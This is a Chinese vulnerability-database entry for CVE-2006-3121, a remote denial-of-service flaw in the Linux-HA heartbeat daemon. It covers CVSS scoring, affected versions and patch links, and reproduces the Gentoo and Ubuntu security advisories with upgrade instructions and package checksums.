CVE-2006-3121
CVSS5.0
 发布时间 :2006-08-16 21:04:00
修订时间 :2011-06-20 00:00:00
NMCOPS    

[原文]The peel_netstring function in cl_netstring.c in the heartbeat subsystem in High-Availability Linux before 1.2.5, and 2.0 before 2.0.7, allows remote attackers to cause a denial of service (crash) via the length parameter in a heartbeat message.

[CNNVD]High-Availability Linux heartbeat消息远程拒绝服务漏洞(CNNVD-200608-271)

        High-Availability Linux 1.2.5之前版本及2.0.7之前的2.0版本中,利用heartbeat子系统的cl_netstring.c程序的peel_netstring函数,远程攻击者可借助heartbeat消息中的长度参数触发拒绝服务攻击(崩溃)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-399 [资源管理错误]

- CPE (受影响的平台与产品)

cpe:/a:high_availability_linux_project:heartbeat:2.0.6
cpe:/a:high_availability_linux_project:heartbeat:2.0.5
cpe:/a:high_availability_linux_project:heartbeat:2.0.3
cpe:/a:high_availability_linux_project:heartbeat:2.0.1
cpe:/a:high_availability_linux_project:heartbeat:2.0.2
cpe:/a:high_availability_linux_project:heartbeat:2.0.4
cpe:/a:high_availability_linux_project:heartbeat:1.2.3
cpe:/a:high_availability_linux_project:heartbeat:1.2.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3121
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3121
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200608-271
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/19516
(PATCH)  BID  19516
http://www.linux-ha.org/SecurityIssues
(PATCH)  CONFIRM  http://www.linux-ha.org/SecurityIssues
http://www.debian.org/security/2006/dsa-1151
(PATCH)  DEBIAN  DSA-1151
http://xforce.iss.net/xforce/xfdb/28396
(UNKNOWN)  XF  heartbeat-packet-dos(28396)
http://www.vupen.com/english/advisories/2006/3288
(VENDOR_ADVISORY)  VUPEN  ADV-2006-3288
http://www.ubuntu.com/usn/usn-335-1
(UNKNOWN)  UBUNTU  USN-335-1
http://www.mandriva.com/security/advisories?name=MDKSA-2006:142
(UNKNOWN)  MANDRIVA  MDKSA-2006:142
http://www.linux-ha.org/_cache/SecurityIssues__sec03.txt
(UNKNOWN)  CONFIRM  http://www.linux-ha.org/_cache/SecurityIssues__sec03.txt
http://security.gentoo.org/glsa/glsa-200608-23.xml
(UNKNOWN)  GENTOO  GLSA-200608-23
http://secunia.com/advisories/21629
(VENDOR_ADVISORY)  SECUNIA  21629
http://secunia.com/advisories/21521
(VENDOR_ADVISORY)  SECUNIA  21521
http://secunia.com/advisories/21518
(VENDOR_ADVISORY)  SECUNIA  21518
http://secunia.com/advisories/21511
(VENDOR_ADVISORY)  SECUNIA  21511
http://secunia.com/advisories/21505
(VENDOR_ADVISORY)  SECUNIA  21505

- 漏洞信息

High-Availability Linux heartbeat消息远程拒绝服务漏洞
中危 设计错误
2006-08-16 00:00:00 2006-08-31 00:00:00
远程  
        High-Availability Linux 1.2.5之前版本及2.0.7之前的2.0版本中,利用heartbeat子系统的cl_netstring.c程序的peel_netstring函数,远程攻击者可借助heartbeat消息中的长度参数触发拒绝服务攻击(崩溃)。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        Linux-HA heartbeat 0.4.9 a
        Linux-HA heartbeat-1.2.5.tar.gz
        http://linux-ha.org/download/heartbeat-1.2.5.tar.gz
        Linux-HA heartbeat 0.4.9 .1
        Linux-HA heartbeat-1.2.5.tar.gz
        http://linux-ha.org/download/heartbeat-1.2.5.tar.gz
        Linux-HA heartbeat 0.4.9 c
        Linux-HA heartbeat-1.2.5.tar.gz
        http://linux-ha.org/download/heartbeat-1.2.5.tar.gz
        Linux-HA heartbeat 0.4.9
        Linux-HA heartbeat-1.2.5.tar.gz
        http://linux-ha.org/download/heartbeat-1.2.5.tar.gz
        Linux-HA heartbeat 0.4.9 b
        Linux-HA heartbeat-1.2.5.tar.gz
        http://linux-ha.org/download/heartbeat-1.2.5.tar.gz
        Linux-HA heartbeat 0.9.4 d
        Linux-HA heartbeat-1.2.5.tar.gz
        http://linux-ha.org/download/heartbeat-1.2.5.tar.gz
        Linux-HA heartbeat 0.9.4
        Linux-HA heartbeat-1.2.5.tar.gz
        http://linux-ha.org/download/heartbeat-1.2.5.tar.gz
        Linux-HA heartbeat 1.2.2
        Linux-HA heartbeat-1.2.5.tar.gz
        http://linux-ha.org/download/heartbeat-1.2.5.tar.gz
        Linux-HA heartbeat 1.2.3
        Debian heartbeat-dev_1.2.3-9sarge6_alpha.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat-dev _1.2.3-9sarge6_alpha.deb
        Debian heartbeat-dev_1.2.3-9sarge6_amd64.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat-dev _1.2.3-9sarge6_amd64.deb
        Debian heartbeat-dev_1.2.3-9sarge6_arm.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat-dev _1.2.3-9sarge6_arm.deb
        Debian heartbeat-dev_1.2.3-9sarge6_hppa.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat-dev _1.2.3-9sarge6_hppa.deb
        Debian heartbeat-dev_1.2.3-9sarge6_i386.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat-dev _1.2.3-9sarge6_i386.deb
        Debian heartbeat-dev_1.2.3-9sarge6_ia64.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat-dev _1.2.3-9sarge6_ia64.deb
        Debian heartbeat-dev_1.2.3-9sarge6_m68k.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat-dev _1.2.3-9sarge6_m68k.deb
        Debian heartbeat-dev_1.2.3-9sarge6_mips.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat-dev _1.2.3-9sarge6_mips.deb
        Debian heartbeat-dev_1.2.3-9sarge6_mipsel.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat-dev _1.2.3-9sarge6_mipsel.deb
        Debian heartbeat-dev_1.2.3-9sarge6_powerpc.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat-dev _1.2.3-9sarge6_powerpc.deb
        Debian heartbeat-dev_1.2.3-9sarge6_s390.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat-dev _1.2.3-9sarge6_s390.deb
        Debian heartbeat-dev_1.2.3-9sarge6_sparc.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat-dev _1.2.3-9sarge6_sparc.deb
        Debian heartbeat/libpils-dev_1.2.3-9sarge6_hppa.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/h/heartbeat/libpils-dev_1 .2.3-9sarge6_hppa.deb
        Debian heartbeat_1.2.3-9sarge6_alpha.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat_1.2 .3-9sarge6_alpha.deb
        Debian heartbeat_1.2.3-9sarge6_amd64.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat_1.2 .3-9sarge6_amd64.deb
        Debian heartbeat_1.2.3-9sarge6_arm.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat_1.2 .3-9sarge6_arm.deb
        Debian heartbeat_1.2.3-9sarge6_hppa.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat_1.2 .3-9sarge6_hppa.deb
        Debian heartbeat_1.2.3-9sarge6_i386.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updat

- 漏洞信息 (F49467)

Gentoo Linux Security Advisory 200608-23 (PacketStormID:F49467)
2006-08-28 00:00:00
Gentoo  security.gentoo.org
advisory,local
linux,gentoo
CVE-2006-3121,CVE-2006-3815
[点击下载]

Gentoo Linux Security Advisory GLSA 200608-23 - Yan Rong Ge discovered that the peel_netstring() function in cl_netstring.c does not validate the length parameter of user input, which can lead to an out-of-bounds memory access when processing certain Heartbeat messages. Furthermore an unspecified local DoS issue was fixed. Versions less than 2.0.7 are affected.

 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200608-23
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Heartbeat: Denial of Service
      Date: August 24, 2006
      Bugs: #141894
        ID: 200608-23

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Heartbeat is vulnerable to a Denial of Service which can be triggered
by a remote attacker without authentication.

Background
==========

Heartbeat is a component of the High-Availability Linux project. It is
used to perform death-of-node detection, communications and cluster
management.

Affected packages
=================

    -------------------------------------------------------------------
     Package                /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  sys-cluster/heartbeat       < 2.0.7                      >= 2.0.7

Description
===========

Yan Rong Ge discovered that the peel_netstring() function in
cl_netstring.c does not validate the "length" parameter of user input,
which can lead to an out-of-bounds memory access when processing
certain Heartbeat messages (CVE-2006-3121). Furthermore an unspecified
local DoS issue was fixed (CVE-2006-3815).

Impact
======

By sending a malicious UDP Heartbeat message, even before
authentication, a remote attacker can crash the master control process
of the cluster.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Heartbeat users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=sys-cluster/heartbeat-2.0.7"

References
==========

  [ 1 ] CVE-2006-3121
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3121
  [ 2 ] CVE-2006-3815
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3815

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200608-23.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

- 漏洞信息 (F49339)

Ubuntu Security Notice 335-1 (PacketStormID:F49339)
2006-08-27 00:00:00
Ubuntu  security.ubuntu.com
advisory,remote,denial of service
linux,ubuntu
CVE-2006-3121
[点击下载]

Ubuntu Security Notice USN-335-1 - Yan Rong Ge discovered that heartbeat did not sufficiently verify some packet input data, which could lead to an out-of-boundary memory access. A remote attacker could exploit this to crash the daemon (Denial of Service).

 
=========================================================== 
Ubuntu Security Notice USN-335-1            August 16, 2006
heartbeat vulnerability
CVE-2006-3121
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.04:
  heartbeat                                1.2.3-3ubuntu1.3

Ubuntu 5.10:
  heartbeat                                1.2.3-12ubuntu0.2

Ubuntu 6.06 LTS:
  heartbeat                                1.2.4-2ubuntu0.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Yan Rong Ge discovered that heartbeat did not sufficiently verify some
packet input data, which could lead to an out-of-boundary memory
access. A remote attacker could exploit this to crash the daemon
(Denial of Service).


Updated packages for Ubuntu 5.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat_1.2.3-3ubuntu1.3.diff.gz
      Size/MD5:   246413 a32a59d76e061bd6bac2e5f6b52d429a
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat_1.2.3-3ubuntu1.3.dsc
      Size/MD5:      847 75287cf172b2324fcb6146fb4f01872b
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat_1.2.3.orig.tar.gz
      Size/MD5:  1772513 9fd126e5dff51cc8c1eee223c252a4af

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/universe/h/heartbeat/ldirectord_1.2.3-3ubuntu1.3_all.deb
      Size/MD5:    44762 29cd137965c61243a58e48119fbc03b8

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat-dev_1.2.3-3ubuntu1.3_amd64.deb
      Size/MD5:   125542 46aefd45f2ae5d7090083a1e6b3abc95
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat_1.2.3-3ubuntu1.3_amd64.deb
      Size/MD5:   533186 8517f467bb79624846faf6e6aef90d37
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libpils-dev_1.2.3-3ubuntu1.3_amd64.deb
      Size/MD5:    61188 55d3822a066db6ca026e73cc93757e2e
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libpils0_1.2.3-3ubuntu1.3_amd64.deb
      Size/MD5:    51876 fb2c92a4afb0b98b825cc4090dce68ca
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libstonith-dev_1.2.3-3ubuntu1.3_amd64.deb
      Size/MD5:    29392 cf935431db7ad29b89510c15fcea7b85
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libstonith0_1.2.3-3ubuntu1.3_amd64.deb
      Size/MD5:    79636 6a8b6cd4849cef83a6da185271a11f40
    http://security.ubuntu.com/ubuntu/pool/universe/h/heartbeat/stonith_1.2.3-3ubuntu1.3_amd64.deb
      Size/MD5:    30374 abb1702cd5fc077f35db186e688afbce

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat-dev_1.2.3-3ubuntu1.3_i386.deb
      Size/MD5:   114930 01d5cf77762f6acdfbbecb07e37684a3
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat_1.2.3-3ubuntu1.3_i386.deb
      Size/MD5:   489742 9043ef6e64721b9594e869d725c674e2
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libpils-dev_1.2.3-3ubuntu1.3_i386.deb
      Size/MD5:    57322 cdd78ca9617f4eeb24777b58eb67a202
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libpils0_1.2.3-3ubuntu1.3_i386.deb
      Size/MD5:    46834 8219c2942dd086c943c40faf9bfb389f
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libstonith-dev_1.2.3-3ubuntu1.3_i386.deb
      Size/MD5:    28940 a3814e2973e4609d64fe70e4a7f861eb
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libstonith0_1.2.3-3ubuntu1.3_i386.deb
      Size/MD5:    69350 db94b20cefcaebffab4eea67565b9649
    http://security.ubuntu.com/ubuntu/pool/universe/h/heartbeat/stonith_1.2.3-3ubuntu1.3_i386.deb
      Size/MD5:    29776 ccbcc61c7f92df0d171e065ff4204f73

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat-dev_1.2.3-3ubuntu1.3_powerpc.deb
      Size/MD5:   127004 b424f598b097fb156b536320ce170079
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat_1.2.3-3ubuntu1.3_powerpc.deb
      Size/MD5:   557220 fc50aba3f599c50adbf0358a2b78c5f2
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libpils-dev_1.2.3-3ubuntu1.3_powerpc.deb
      Size/MD5:    61250 05d241db1f4e3c99509d429d761a418a
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libpils0_1.2.3-3ubuntu1.3_powerpc.deb
      Size/MD5:    52888 44bedf0db1b7eaec32e7c4c040a80fc8
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libstonith-dev_1.2.3-3ubuntu1.3_powerpc.deb
      Size/MD5:    29522 e89eb0728dc6b46cef2a4421872c20c9
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libstonith0_1.2.3-3ubuntu1.3_powerpc.deb
      Size/MD5:    89106 ce852114e4f3c91b5ed12bb706cfdef8
    http://security.ubuntu.com/ubuntu/pool/universe/h/heartbeat/stonith_1.2.3-3ubuntu1.3_powerpc.deb
      Size/MD5:    32670 c18a2c412a2c17040288757ab41ecec8

Updated packages for Ubuntu 5.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat_1.2.3-12ubuntu0.2.diff.gz
      Size/MD5:   273336 1dd9d49f0e6ca1c4ad0cd6f4204e335b
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat_1.2.3-12ubuntu0.2.dsc
      Size/MD5:      889 c511e2aa94e679e9eff82adcbee08b41
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat_1.2.3.orig.tar.gz
      Size/MD5:  1772513 9fd126e5dff51cc8c1eee223c252a4af

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/universe/h/heartbeat/ldirectord_1.2.3-12ubuntu0.2_all.deb
      Size/MD5:    45854 750a984cbd6ce9c1dd0097a4198f0ca3

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat-dev_1.2.3-12ubuntu0.2_amd64.deb
      Size/MD5:   127776 1d448a189109479077a8290a5c659026
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat_1.2.3-12ubuntu0.2_amd64.deb
      Size/MD5:   541888 e0f612fd655b1a1b47a5797e9f9622e4
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libpils-dev_1.2.3-12ubuntu0.2_amd64.deb
      Size/MD5:    62304 b0971134f0e63d0b04b1eacf4c106a92
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libpils0_1.2.3-12ubuntu0.2_amd64.deb
      Size/MD5:    52604 f6bbc5928693d83eedba3b40538539af
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libstonith-dev_1.2.3-12ubuntu0.2_amd64.deb
      Size/MD5:    30608 f9be97032f2d07d84b0eba62d4e25fd1
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libstonith0_1.2.3-12ubuntu0.2_amd64.deb
      Size/MD5:    87998 e88a8156ecd5937680b26fa332b14d02
    http://security.ubuntu.com/ubuntu/pool/universe/h/heartbeat/stonith_1.2.3-12ubuntu0.2_amd64.deb
      Size/MD5:    37580 2c9e9822d627dd2ad97d9b1183a71784

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat-dev_1.2.3-12ubuntu0.2_i386.deb
      Size/MD5:   116680 84e0c3ea4dbc8c300fd05b2f62ded9f6
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat_1.2.3-12ubuntu0.2_i386.deb
      Size/MD5:   497468 6cf607fd94755e6c1076447a4c92ec80
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libpils-dev_1.2.3-12ubuntu0.2_i386.deb
      Size/MD5:    57882 1e3f7e8e476f1907d6b0d1a4b627536e
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libpils0_1.2.3-12ubuntu0.2_i386.deb
      Size/MD5:    46858 d0ab201dec6e864c7e41214fbc9be9cf
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libstonith-dev_1.2.3-12ubuntu0.2_i386.deb
      Size/MD5:    30072 ad5f9a1b7dc521710292ec3518b5f165
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libstonith0_1.2.3-12ubuntu0.2_i386.deb
      Size/MD5:    77104 7e350144a07fe09f10b32750a1c61e9e
    http://security.ubuntu.com/ubuntu/pool/universe/h/heartbeat/stonith_1.2.3-12ubuntu0.2_i386.deb
      Size/MD5:    37036 e5752110be935d33c7aa349bbae973be

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat-dev_1.2.3-12ubuntu0.2_powerpc.deb
      Size/MD5:   129432 0db3a97b8ffaaaec28c6077cdaa91106
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat_1.2.3-12ubuntu0.2_powerpc.deb
      Size/MD5:   566250 aa6f9a94380dd0c8f35c4162f9a7190a
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libpils-dev_1.2.3-12ubuntu0.2_powerpc.deb
      Size/MD5:    62180 0d6d9ae143eae7d1ac08ae16b72fe1cd
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libpils0_1.2.3-12ubuntu0.2_powerpc.deb
      Size/MD5:    53504 b1909517f0120923db76a60353063e82
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libstonith-dev_1.2.3-12ubuntu0.2_powerpc.deb
      Size/MD5:    30662 8ea1cef321861f731a378d05148813c3
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libstonith0_1.2.3-12ubuntu0.2_powerpc.deb
      Size/MD5:    99326 de0e40548345390131f98a1c917b83c6
    http://security.ubuntu.com/ubuntu/pool/universe/h/heartbeat/stonith_1.2.3-12ubuntu0.2_powerpc.deb
      Size/MD5:    40162 f3316b95e6b3c0861da907dc38f5554f

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat-dev_1.2.3-12ubuntu0.2_sparc.deb
      Size/MD5:   122256 c51178df35945992e5e9f8967f0b7fed
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat_1.2.3-12ubuntu0.2_sparc.deb
      Size/MD5:   511418 31cd378ecd6e5c8b2c931de714371de1
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libpils-dev_1.2.3-12ubuntu0.2_sparc.deb
      Size/MD5:    63178 f53d5ea5ab878aed6e4a4961dfee1971
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libpils0_1.2.3-12ubuntu0.2_sparc.deb
      Size/MD5:    49732 c8a599ba808d32c2b0c04c5b96d9f5d2
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libstonith-dev_1.2.3-12ubuntu0.2_sparc.deb
      Size/MD5:    30374 b44d9b7a067d08c6c2960019b64e9f61
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libstonith0_1.2.3-12ubuntu0.2_sparc.deb
      Size/MD5:    81104 66622f1b3ed5fde44f2a6a50f85ca6c1
    http://security.ubuntu.com/ubuntu/pool/universe/h/heartbeat/stonith_1.2.3-12ubuntu0.2_sparc.deb
      Size/MD5:    37230 eba867c3d200dc0249cebd2da630b072

Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat_1.2.4-2ubuntu0.2.diff.gz
      Size/MD5:     2894 e5ad9377750f020b54f650d4163dc172
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat_1.2.4-2ubuntu0.2.dsc
      Size/MD5:      912 7ec8149d4ebbb71b24697fffe83767d3
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat_1.2.4.orig.tar.gz
      Size/MD5:  2102978 7e3f752af06c25f7141c4b67a538e718

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/universe/h/heartbeat/ldirectord_1.2.4-2ubuntu0.2_all.deb
      Size/MD5:    48766 6cb064dbd5c94e2da32eb0e9b02d49c9

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat-dev_1.2.4-2ubuntu0.2_amd64.deb
      Size/MD5:   133098 2f223c39712a7235c8f8c7c2a21e09c2
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat_1.2.4-2ubuntu0.2_amd64.deb
      Size/MD5:   526412 48cc81aa739fba9f3410bf3a51e5d331
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libpils-dev_1.2.4-2ubuntu0.2_amd64.deb
      Size/MD5:    64332 a73aeb5dbf95e3d5ae5c57056d4cf91e
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libpils0_1.2.4-2ubuntu0.2_amd64.deb
      Size/MD5:    54446 d73f641c1e9487fff2c2fb22f017e5ea
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libstonith-dev_1.2.4-2ubuntu0.2_amd64.deb
      Size/MD5:    32496 d553b22e8e75370082a5dd002796e88a
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libstonith0_1.2.4-2ubuntu0.2_amd64.deb
      Size/MD5:   104152 8c6d557471a0f3238e7f4238eaec3f60
    http://security.ubuntu.com/ubuntu/pool/universe/h/heartbeat/stonith_1.2.4-2ubuntu0.2_amd64.deb
      Size/MD5:    39478 99820cf60c7ce7fb9f079dffca1115c8

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat-dev_1.2.4-2ubuntu0.2_i386.deb
      Size/MD5:   121174 8a60debc025bbceb68a418289166e90f
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat_1.2.4-2ubuntu0.2_i386.deb
      Size/MD5:   486972 2b0b999e0088dfc3d8b9b2751fd111e5
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libpils-dev_1.2.4-2ubuntu0.2_i386.deb
      Size/MD5:    59820 a0b6a5acbad1c81dab74b90bbe6e9998
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libpils0_1.2.4-2ubuntu0.2_i386.deb
      Size/MD5:    48574 9052de56fdb50c08b2e38a2c7116cab8
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libstonith-dev_1.2.4-2ubuntu0.2_i386.deb
      Size/MD5:    32022 f3fadd9eddcaf0efa3bb3b800ead25f6
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libstonith0_1.2.4-2ubuntu0.2_i386.deb
      Size/MD5:    91034 dda9ce215fdff5f6b59a193d3601faa2
    http://security.ubuntu.com/ubuntu/pool/universe/h/heartbeat/stonith_1.2.4-2ubuntu0.2_i386.deb
      Size/MD5:    38924 fbf4e15399628d362eb99624bb873d7d

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat-dev_1.2.4-2ubuntu0.2_powerpc.deb
      Size/MD5:   134860 b7fa774f4ea883381f4907178c56133a
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat_1.2.4-2ubuntu0.2_powerpc.deb
      Size/MD5:   551472 b36b62324ff4f89ced239c2a9b4e71f0
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libpils-dev_1.2.4-2ubuntu0.2_powerpc.deb
      Size/MD5:    64242 667a1c57b8023835f8db5eaedbf81a5b
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libpils0_1.2.4-2ubuntu0.2_powerpc.deb
      Size/MD5:    55304 02113649bbb20e24d29297a61e9f600c
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libstonith-dev_1.2.4-2ubuntu0.2_powerpc.deb
      Size/MD5:    32608 94fd3022620af4641c7533928a498aae
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libstonith0_1.2.4-2ubuntu0.2_powerpc.deb
      Size/MD5:   117438 788421eb2b921e6fc1ee547e2de62f95
    http://security.ubuntu.com/ubuntu/pool/universe/h/heartbeat/stonith_1.2.4-2ubuntu0.2_powerpc.deb
      Size/MD5:    41976 22e5d2006315777b2ac9cbd4b5d25561

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat-dev_1.2.4-2ubuntu0.2_sparc.deb
      Size/MD5:   126650 18703847139c2204ea39a5a8a03b4d00
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/heartbeat_1.2.4-2ubuntu0.2_sparc.deb
      Size/MD5:   498094 b4efa8560d04b45abb0e4b28ac59d788
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libpils-dev_1.2.4-2ubuntu0.2_sparc.deb
      Size/MD5:    65200 f74c41bc9b1f6149e38cf18ac499a5ad
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libpils0_1.2.4-2ubuntu0.2_sparc.deb
      Size/MD5:    51586 145b8036334b7ecca86743d9af207a3b
